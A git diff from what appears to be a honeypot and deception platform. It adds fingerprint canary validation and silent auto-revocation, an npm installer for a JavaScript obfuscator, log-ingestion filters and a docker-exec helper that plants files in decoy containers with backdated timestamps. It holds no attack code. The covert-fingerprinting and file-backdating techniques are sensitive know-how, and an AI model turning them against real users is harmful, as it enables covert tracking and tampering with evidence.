parsed_fp: Optional[dict] = None,
|
||||||
|
raw_nonce: Optional[str] = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||||
|
|
||||||
Unknown slugs are silently swallowed: returning the same response
|
Unknown slugs are silently swallowed: returning the same response
|
||||||
for known and unknown slugs is the stealth posture, and persisting
|
for known and unknown slugs is the stealth posture, and persisting
|
||||||
every random scan would clutter the DB.
|
every random scan would clutter the DB.
|
||||||
|
|
||||||
|
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
|
||||||
|
it is validated through four layers before being merged into raw_headers:
|
||||||
|
A) nonce match against CanaryToken.fingerprint_nonce,
|
||||||
|
B) structural shape check,
|
||||||
|
C) mint UUID consistency,
|
||||||
|
D) per-(token, IP) rate limit.
|
||||||
|
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
|
||||||
|
The trigger row always lands regardless — the GET hit is itself forensic.
|
||||||
"""
|
"""
|
||||||
token = await repo.get_canary_token_by_slug(slug)
|
token = await repo.get_canary_token_by_slug(slug)
|
||||||
if token is None:
|
if token is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
final_headers: dict[str, Any] = dict(raw_headers or {})
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
|
||||||
|
|
||||||
|
# Layer A — nonce
|
||||||
|
if stored_nonce is not None and raw_nonce != stored_nonce:
|
||||||
|
final_headers["_fp_invalid_nonce"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer B — shape (only when nonce passed or no nonce enforced)
|
||||||
|
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
|
||||||
|
final_headers["_fp_invalid_shape"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer C — mint UUID consistency
|
||||||
|
if parsed_fp is not None:
|
||||||
|
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
|
||||||
|
if parsed_fp.get("mint") != expected_mint:
|
||||||
|
final_headers["_fp_invalid_mint"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer D — rate limit
|
||||||
|
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
|
||||||
|
final_headers["_fp_rate_limited"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
final_headers["_fp"] = parsed_fp
|
||||||
|
|
||||||
trigger_id = await repo.record_canary_trigger({
|
trigger_id = await repo.record_canary_trigger({
|
||||||
"token_uuid": token["uuid"],
|
"token_uuid": token["uuid"],
|
||||||
"occurred_at": datetime.now(timezone.utc),
|
"occurred_at": datetime.now(timezone.utc),
|
||||||
@@ -171,7 +321,7 @@ async def _record_hit(
|
|||||||
"user_agent": user_agent,
|
"user_agent": user_agent,
|
||||||
"request_path": request_path,
|
"request_path": request_path,
|
||||||
"dns_qname": dns_qname,
|
"dns_qname": dns_qname,
|
||||||
"raw_headers": raw_headers or {},
|
"raw_headers": final_headers,
|
||||||
})
|
})
|
||||||
try:
|
try:
|
||||||
await bus.publish(
|
await bus.publish(
|
||||||
@@ -189,6 +339,22 @@ async def _record_hit(
|
|||||||
except Exception as e: # noqa: BLE001 — best effort
|
except Exception as e: # noqa: BLE001 — best effort
|
||||||
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
|
||||||
|
|
||||||
|
# Auto-deregister fingerprint canaries after the first valid fingerprint
|
||||||
|
# is collected. Slug goes dark; the stealth posture means the attacker
|
||||||
|
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
|
||||||
|
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
|
||||||
|
# http/dns canaries are NOT auto-revoked.
|
||||||
|
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
|
||||||
|
try:
|
||||||
|
await repo.update_canary_token_state(token["uuid"], "revoked")
|
||||||
|
await bus.publish(
|
||||||
|
topics.canary(token["uuid"], topics.CANARY_REVOKED),
|
||||||
|
{"token_id": token["uuid"], "trigger_id": trigger_id,
|
||||||
|
"reason": "fingerprint_collected"},
|
||||||
|
)
|
||||||
|
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
|
||||||
|
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------- DNS surface --------------------------------
|
# ---------------------------- DNS surface --------------------------------
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,13 @@
|
|||||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||||
|
|
||||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
Two entry points share this module:
|
||||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
|
||||||
:func:`decnet.canary.worker.run`.
|
* ``decnet canary`` — runs the worker process. Mirrors the shape of
|
||||||
|
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
|
||||||
|
systemd unit so its argv must stay stable.
|
||||||
|
* ``decnet canary-install-toolchain`` — provisions the Node side of
|
||||||
|
the fingerprint-canary obfuscator. Idempotent; safe to call from
|
||||||
|
the API service unit's ``ExecStartPre``.
|
||||||
|
|
||||||
Not master-only — any host that hosts deckies can run its own
|
Not master-only — any host that hosts deckies can run its own
|
||||||
canary worker (the bus events stay local; the webhook worker on
|
canary worker (the bus events stay local; the webhook worker on
|
||||||
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import shutil
|
||||||
|
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
import typer
|
import typer
|
||||||
|
|
||||||
from . import utils as _utils
|
from . import utils as _utils
|
||||||
from .utils import console, log
|
from .utils import console, log
|
||||||
|
|
||||||
|
_TOOLCHAIN_TIMEOUT_S = 180
|
||||||
|
|
||||||
|
|
||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command(name="canary")
|
@app.command(name="canary")
|
||||||
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
|
|||||||
asyncio.run(run())
|
asyncio.run(run())
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="canary-install-toolchain")
|
||||||
|
def canary_install_toolchain(
|
||||||
|
npm_bin: str = typer.Option(
|
||||||
|
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
|
||||||
|
),
|
||||||
|
) -> None:
|
||||||
|
"""Install the Node-side toolchain used by fingerprint canaries.
|
||||||
|
|
||||||
|
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
|
||||||
|
directory so the obfuscator's helper script can ``require()``
|
||||||
|
``javascript-obfuscator`` at mint time. Requires Node >= 18.
|
||||||
|
|
||||||
|
Idempotent: re-running on an already-installed tree is fast
|
||||||
|
(npm short-circuits when ``node_modules/`` is up-to-date).
|
||||||
|
"""
|
||||||
|
import decnet.canary as _canary_pkg
|
||||||
|
canary_dir = Path(_canary_pkg.__file__).resolve().parent
|
||||||
|
if not (canary_dir / "package.json").is_file():
|
||||||
|
console.print(
|
||||||
|
f"[red]canary package.json not found under {canary_dir}; "
|
||||||
|
"wheel may be missing the JS toolchain payload.[/]"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=2)
|
||||||
|
if shutil.which(npm_bin) is None:
|
||||||
|
console.print(
|
||||||
|
f"[red]npm executable {npm_bin!r} not found on PATH. "
|
||||||
|
"Install Node >= 18 and re-run.[/]"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=2)
|
||||||
|
console.print(
|
||||||
|
f"[cyan]installing canary toolchain[/] in {canary_dir}",
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
|
||||||
|
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
|
||||||
|
cwd=str(canary_dir),
|
||||||
|
capture_output=True, text=True,
|
||||||
|
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
|
||||||
|
)
|
||||||
|
except subprocess.TimeoutExpired:
|
||||||
|
console.print("[red]npm install timed out after 3 minutes[/]")
|
||||||
|
raise typer.Exit(code=3) from None
|
||||||
|
if proc.returncode != 0:
|
||||||
|
console.print(
|
||||||
|
f"[red]npm install failed rc={proc.returncode}[/]\n"
|
||||||
|
f"{proc.stderr.strip()}"
|
||||||
|
)
|
||||||
|
raise typer.Exit(code=proc.returncode)
|
||||||
|
console.print("[green]canary toolchain ready[/]")
|
||||||
|
|||||||
@@ -74,6 +74,7 @@ _CONFIG_PLACEHOLDER = """\
|
|||||||
# master-host = 10.0.0.1
|
# master-host = 10.0.0.1
|
||||||
# syslog-port = 6514
|
# syslog-port = 6514
|
||||||
# swarmctl-port = 8770
|
# swarmctl-port = 8770
|
||||||
|
# swarmctl-host = 127.0.0.1
|
||||||
|
|
||||||
# [logging]
|
# [logging]
|
||||||
# system-log = /var/log/decnet/decnet.system.log
|
# system-log = /var/log/decnet/decnet.system.log
|
||||||
|
|||||||
@@ -16,8 +16,16 @@ from .utils import console, log
|
|||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command()
|
@app.command()
|
||||||
def swarmctl(
|
def swarmctl(
|
||||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
port: int = typer.Option(
|
||||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
8770, "--port",
|
||||||
|
envvar="DECNET_SWARMCTL_PORT",
|
||||||
|
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
|
||||||
|
),
|
||||||
|
host: str = typer.Option(
|
||||||
|
"127.0.0.1", "--host",
|
||||||
|
envvar="DECNET_SWARMCTL_HOST",
|
||||||
|
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
|
||||||
|
),
|
||||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||||
|
|||||||
@@ -233,8 +233,8 @@ def _delete(
|
|||||||
topo = await repo.get_topology(topology_id)
|
topo = await repo.get_topology(topology_id)
|
||||||
if topo is None:
|
if topo is None:
|
||||||
return False, "not-found"
|
return False, "not-found"
|
||||||
if topo["status"] in _RUNNING:
|
if topo.status in _RUNNING:
|
||||||
return False, str(topo["status"])
|
return False, str(topo.status)
|
||||||
ok = await repo.delete_topology_cascade(topology_id)
|
ok = await repo.delete_topology_cascade(topology_id)
|
||||||
return ok, None
|
return ok, None
|
||||||
|
|
||||||
|
|||||||
@@ -342,7 +342,7 @@ def combined_campaign_weight(
|
|||||||
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
|
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
|
||||||
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
||||||
|
|||||||
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
|
|||||||
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
|
def from_synthetic(att) -> Observation:
|
||||||
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Lives here so test code doesn't import the factory shape into the
|
Lives here so test code doesn't import the factory shape into the
|
||||||
|
|||||||
@@ -75,6 +75,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
|
|||||||
)
|
)
|
||||||
_RL_MAX_ENTRIES: int = 10_000
|
_RL_MAX_ENTRIES: int = 10_000
|
||||||
|
|
||||||
|
# APP-NAMEs we never want to see in the ingestion stream — native unix
|
||||||
|
# daemons that share a container with a DECNET service. Their logs are
|
||||||
|
# noise: sshd's "Failed password for root from X" duplicates the
|
||||||
|
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
|
||||||
|
# again, and CRON/systemd/etc. say nothing about attacker behavior.
|
||||||
|
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
|
||||||
|
_DROP_APPS: frozenset[str] = frozenset(
|
||||||
|
a.strip()
|
||||||
|
for a in os.environ.get(
|
||||||
|
"DECNET_COLLECTOR_DROP_APPS",
|
||||||
|
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
|
||||||
|
).split(",")
|
||||||
|
if a.strip()
|
||||||
|
)
|
||||||
|
|
||||||
_rl_lock: threading.Lock = threading.Lock()
|
_rl_lock: threading.Lock = threading.Lock()
|
||||||
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||||
|
|
||||||
@@ -82,10 +97,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
|
|||||||
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
||||||
"""
|
"""
|
||||||
Return True if this parsed event should be written to the JSON ingestion
|
Return True if this parsed event should be written to the JSON ingestion
|
||||||
stream. Rate-limited connection-lifecycle events return False when another
|
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
|
||||||
event with the same (attacker_ip, decky, service, event_type) was emitted
|
rate-limits connection-lifecycle events within a dedup window.
|
||||||
inside the dedup window.
|
|
||||||
"""
|
"""
|
||||||
|
if parsed.get("service", "") in _DROP_APPS:
|
||||||
|
return False
|
||||||
event_type = parsed.get("event_type", "")
|
event_type = parsed.get("event_type", "")
|
||||||
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
||||||
return True
|
return True
|
||||||
@@ -220,6 +236,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
|||||||
except ValueError:
|
except ValueError:
|
||||||
ts_formatted = ts_raw
|
ts_formatted = ts_raw
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
|
||||||
|
# "CMD ") get event_type rewritten to "command". `fields` stays empty
|
||||||
|
# so the frontend's msg-based pill rendering doesn't double up.
|
||||||
|
if event_type == "-" and msg.startswith("CMD "):
|
||||||
|
event_type = "command"
|
||||||
|
|
||||||
return {
|
return {
|
||||||
"timestamp": ts_formatted,
|
"timestamp": ts_formatted,
|
||||||
"decky": decky,
|
"decky": decky,
|
||||||
|
|||||||
@@ -39,6 +39,7 @@ Shape::
|
|||||||
master-host = 10.0.0.1 # required on agents
|
master-host = 10.0.0.1 # required on agents
|
||||||
syslog-port = 6514
|
syslog-port = 6514
|
||||||
swarmctl-port = 8770
|
swarmctl-port = 8770
|
||||||
|
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
|
||||||
|
|
||||||
[logging]
|
[logging]
|
||||||
system-log = /var/log/decnet/decnet.system.log
|
system-log = /var/log/decnet/decnet.system.log
|
||||||
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
|
|||||||
"master-host": "DECNET_SWARM_MASTER_HOST",
|
"master-host": "DECNET_SWARM_MASTER_HOST",
|
||||||
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
||||||
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
||||||
|
"swarmctl-host": "DECNET_SWARMCTL_HOST",
|
||||||
},
|
},
|
||||||
"logging": {
|
"logging": {
|
||||||
"system-log": "DECNET_SYSTEM_LOGS",
|
"system-log": "DECNET_SYSTEM_LOGS",
|
||||||
|
|||||||
@@ -137,6 +137,19 @@ def parse_line(line: str) -> LogEvent | None:
|
|||||||
msg = tail.group(1).strip() if tail else ""
|
msg = tail.group(1).strip() if tail else ""
|
||||||
attacker_ip = _extract_attacker_ip(fields, msg)
|
attacker_ip = _extract_attacker_ip(fields, msg)
|
||||||
|
|
||||||
|
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
|
||||||
|
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
|
||||||
|
# Without this rewrite they're invisible to the behavioral profiler, which
|
||||||
|
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
|
||||||
|
# invocation uses --msgid command, so we must also handle the non-nil case.
|
||||||
|
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
|
||||||
|
event_type = "command"
|
||||||
|
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||||
|
for k, v in re.findall(r'(\w+)=(\S+)', head):
|
||||||
|
fields.setdefault(k, v)
|
||||||
|
if sep:
|
||||||
|
fields.setdefault("command", cmd_rest)
|
||||||
|
|
||||||
# Mutator-emitted transitions arrive on the same ingest stream but
|
# Mutator-emitted transitions arrive on the same ingest stream but
|
||||||
# belong in the substrate-state index, not the per-IP attacker one.
|
# belong in the substrate-state index, not the per-IP attacker one.
|
||||||
kind: EventKind = (
|
kind: EventKind = (
|
||||||
|
|||||||
@@ -70,7 +70,7 @@ async def run_reuse_loop(
|
|||||||
wake_tasks.append(asyncio.create_task(
|
wake_tasks.append(asyncio.create_task(
|
||||||
_run_control_listener_signal(bus, "reuse-correlator"),
|
_run_control_listener_signal(bus, "reuse-correlator"),
|
||||||
))
|
))
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
"reuse correlator: bus unavailable, running in poll-only mode: %s",
|
||||||
exc,
|
exc,
|
||||||
@@ -86,7 +86,7 @@ async def run_reuse_loop(
|
|||||||
results = await engine.correlate_credential_reuse(
|
results = await engine.correlate_credential_reuse(
|
||||||
repo, min_targets=min_targets,
|
repo, min_targets=min_targets,
|
||||||
)
|
)
|
||||||
except Exception: # noqa: BLE001
|
except Exception:
|
||||||
log.exception("reuse correlator: tick failed")
|
log.exception("reuse correlator: tick failed")
|
||||||
results = []
|
results = []
|
||||||
|
|
||||||
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
|
|||||||
wake.set()
|
wake.set()
|
||||||
except asyncio.CancelledError:
|
except asyncio.CancelledError:
|
||||||
raise
|
raise
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc:
|
||||||
log.warning(
|
log.warning(
|
||||||
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
"reuse correlator: subscriber for %s died (%s); falling back to poll",
|
||||||
pattern, exc,
|
pattern, exc,
|
||||||
|
|||||||
39
decnet/decky_io/__init__.py
Normal file
39
decnet/decky_io/__init__.py
Normal file
@@ -0,0 +1,39 @@
|
|||||||
|
"""Shared primitives for writing/deleting files inside running deckies.
|
||||||
|
|
||||||
|
The canary planter and the orchestrator SSH driver both need to drop
|
||||||
|
bytes into a decky container's filesystem, then sometimes unlink them.
|
||||||
|
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
|
||||||
|
before this module existed.
|
||||||
|
|
||||||
|
Public API:
|
||||||
|
|
||||||
|
* :func:`write_file_to_container` — write bytes at a path, set mode,
|
||||||
|
optionally backdate mtime.
|
||||||
|
* :func:`delete_file_from_container` — best-effort ``rm -f``.
|
||||||
|
* :func:`resolve_topology_container` — pick the right docker container
|
||||||
|
for a MazeNET decky based on its services list.
|
||||||
|
* :func:`resolve_decky_container` — async helper that takes
|
||||||
|
``(decky_name, topology_id?)``, hydrates the topology when needed,
|
||||||
|
and returns the docker container name.
|
||||||
|
|
||||||
|
Container resolution conventions are documented in
|
||||||
|
:mod:`decnet.topology.compose`; we mirror them here without taking
|
||||||
|
a runtime dependency on the compose generator.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from .resolve import (
|
||||||
|
resolve_decky_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
)
|
||||||
|
from .write import (
|
||||||
|
delete_file_from_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"delete_file_from_container",
|
||||||
|
"resolve_decky_container",
|
||||||
|
"resolve_topology_container",
|
||||||
|
"write_file_to_container",
|
||||||
|
]
|
||||||
72
decnet/decky_io/resolve.py
Normal file
72
decnet/decky_io/resolve.py
Normal file
@@ -0,0 +1,72 @@
|
|||||||
|
"""Decky-name → docker container name resolution.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Fleet**: every fleet decky has a ``ssh`` service container named
|
||||||
|
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
|
||||||
|
target it because it carries the most realistic filesystem layout.
|
||||||
|
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
|
||||||
|
decky exposes the ssh service; otherwise the decky's base container
|
||||||
|
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
|
||||||
|
:func:`decnet.topology.compose._container_name`).
|
||||||
|
|
||||||
|
Keeping resolution centralised here means new ``docker exec`` callers
|
||||||
|
(file drops, future bulk planters, etc.) never need to learn the
|
||||||
|
naming conventions — they just call :func:`resolve_decky_container`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
|
_SSH_CONTAINER_SUFFIX = "-ssh"
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_topology_container(
|
||||||
|
topology_id: str, decky_name: str, services: Iterable[str],
|
||||||
|
) -> str:
|
||||||
|
"""Container name for a MazeNET decky.
|
||||||
|
|
||||||
|
See module docstring for the convention. Pure function — no I/O.
|
||||||
|
"""
|
||||||
|
if "ssh" in set(services):
|
||||||
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
return f"decnet_t_{topology_id[:8]}_{decky_name}"
|
||||||
|
|
||||||
|
|
||||||
|
async def resolve_decky_container(
|
||||||
|
repo: Any,
|
||||||
|
decky_name: str,
|
||||||
|
*,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
) -> str:
|
||||||
|
"""Resolve the docker container name for *decky_name*.
|
||||||
|
|
||||||
|
Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
|
||||||
|
unconditionally. No DB lookup — the caller is responsible for
|
||||||
|
knowing the decky exists; if it doesn't, the subsequent
|
||||||
|
``docker exec`` returns a clear error.
|
||||||
|
|
||||||
|
Topology path: hydrates the topology, looks up the decky's services
|
||||||
|
list, delegates to :func:`resolve_topology_container`.
|
||||||
|
|
||||||
|
Raises:
|
||||||
|
LookupError — when ``topology_id`` is set but the topology or
|
||||||
|
its named decky doesn't exist. Callers translate this into
|
||||||
|
404/422 at the API layer.
|
||||||
|
"""
|
||||||
|
if topology_id is None:
|
||||||
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
raise LookupError(f"topology {topology_id!r} not found")
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
name = cfg.get("name") or decky.get("name")
|
||||||
|
if name == decky_name:
|
||||||
|
services = decky.get("services") or []
|
||||||
|
return resolve_topology_container(topology_id, decky_name, services)
|
||||||
|
raise LookupError(
|
||||||
|
f"decky {decky_name!r} is not in topology {topology_id!r}"
|
||||||
|
)
|
||||||
124
decnet/decky_io/write.py
Normal file
124
decnet/decky_io/write.py
Normal file
@@ -0,0 +1,124 @@
|
|||||||
|
"""``docker exec``-driven file write/delete inside a decky container.
|
||||||
|
|
||||||
|
The write path streams a base64-encoded payload over stdin to
|
||||||
|
``base64 -d`` inside the container, so binary content of any size up
|
||||||
|
to docker's stream limits is safe — interpolating bytes into argv
|
||||||
|
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import shlex
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Optional
|
||||||
|
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
|
||||||
|
log = get_logger("decky_io.write")
|
||||||
|
|
||||||
|
_DOCKER = "docker"
|
||||||
|
_DEFAULT_TIMEOUT = 8.0
|
||||||
|
|
||||||
|
|
||||||
|
def _dirname(path: str) -> str:
|
||||||
|
idx = path.rfind("/")
|
||||||
|
if idx <= 0:
|
||||||
|
return "/"
|
||||||
|
return path[:idx]
|
||||||
|
|
||||||
|
|
||||||
|
async def _run(
|
||||||
|
argv: list[str],
|
||||||
|
*,
|
||||||
|
stdin_bytes: Optional[bytes] = None,
|
||||||
|
timeout: float = _DEFAULT_TIMEOUT,
|
||||||
|
) -> tuple[int, str, str]:
|
||||||
|
try:
|
||||||
|
proc = await asyncio.create_subprocess_exec(
|
||||||
|
*argv,
|
||||||
|
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
||||||
|
stdout=asyncio.subprocess.PIPE,
|
||||||
|
stderr=asyncio.subprocess.PIPE,
|
||||||
|
)
|
||||||
|
except FileNotFoundError as exc:
|
||||||
|
return 127, "", f"argv[0] not found: {exc}"
|
||||||
|
try:
|
||||||
|
stdout, stderr = await asyncio.wait_for(
|
||||||
|
proc.communicate(input=stdin_bytes), timeout=timeout,
|
||||||
|
)
|
||||||
|
except asyncio.TimeoutError:
|
||||||
|
try:
|
||||||
|
proc.kill()
|
||||||
|
except ProcessLookupError:
|
||||||
|
pass
|
||||||
|
return 124, "", "timeout"
|
||||||
|
return (
|
||||||
|
proc.returncode if proc.returncode is not None else -1,
|
||||||
|
stdout.decode("utf-8", "replace"),
|
||||||
|
stderr.decode("utf-8", "replace"),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def write_file_to_container(
|
||||||
|
container: str,
|
||||||
|
path: str,
|
||||||
|
content: bytes,
|
||||||
|
*,
|
||||||
|
mode: int = 0o644,
|
||||||
|
mtime: Optional[datetime] = None,
|
||||||
|
timeout: float = _DEFAULT_TIMEOUT,
|
||||||
|
) -> tuple[bool, Optional[str]]:
|
||||||
|
"""Write *content* to *path* inside *container* via ``docker exec``.
|
||||||
|
|
||||||
|
The directory above *path* is created if missing; *mode* is applied
|
||||||
|
after the write; when *mtime* is provided the file is backdated via
|
||||||
|
``touch -d`` (UTC ISO 8601).
|
||||||
|
|
||||||
|
Returns ``(success, error_or_none)``. ``error`` is the trimmed
|
||||||
|
docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
|
||||||
|
"""
|
||||||
|
if not path:
|
||||||
|
return False, "empty path"
|
||||||
|
|
||||||
|
encoded = base64.b64encode(content)
|
||||||
|
parts = [
|
||||||
|
f"mkdir -p {shlex.quote(_dirname(path))}",
|
||||||
|
f"base64 -d > {shlex.quote(path)}",
|
||||||
|
f"chmod {mode:o} {shlex.quote(path)}",
|
||||||
|
]
|
||||||
|
if mtime is not None:
|
||||||
|
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||||
|
parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
|
||||||
|
sh_cmd = " && ".join(parts)
|
||||||
|
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
||||||
|
rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
|
||||||
|
success = rc == 0
|
||||||
|
if success:
|
||||||
|
return True, None
|
||||||
|
err = stderr.strip()[:256] or f"rc={rc}"
|
||||||
|
log.warning(
|
||||||
|
"decky_io.write failed container=%s path=%s rc=%d stderr=%r",
|
||||||
|
container, path, rc, stderr[:120],
|
||||||
|
)
|
||||||
|
return False, err
|
||||||
|
|
||||||
|
|
||||||
|
async def delete_file_from_container(
|
||||||
|
